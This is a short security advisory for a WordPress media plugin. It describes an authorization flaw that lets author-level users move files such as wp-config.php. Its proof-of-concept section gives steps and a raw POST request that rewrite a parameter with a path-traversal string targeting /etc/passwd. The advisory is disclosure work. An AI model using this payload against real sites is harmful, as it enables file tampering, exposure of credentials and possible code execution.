Description The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases. In 11.16, the manage_options capability was used, however is still insufficient in case of MultiSite setups
PoC
- Go to /wp-admin/admin.php?page=mediafromftp-search-register 2) Select any file from the media text list below 3) Click “Update Media” 4) Intercept request with action=mediafromftp-update-ajax-action 5) Change “new_url” by adding the following to the file path: /…/…/…/…/…/…/…/…/…/…/etc/passwd POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 action=mediafromftp-update-ajax-action&nonce;=9c0c0115ee&maxcount;=1&new;_url=/etc/passwd&new;_datetime=2023-07-10+20%3A53%3A36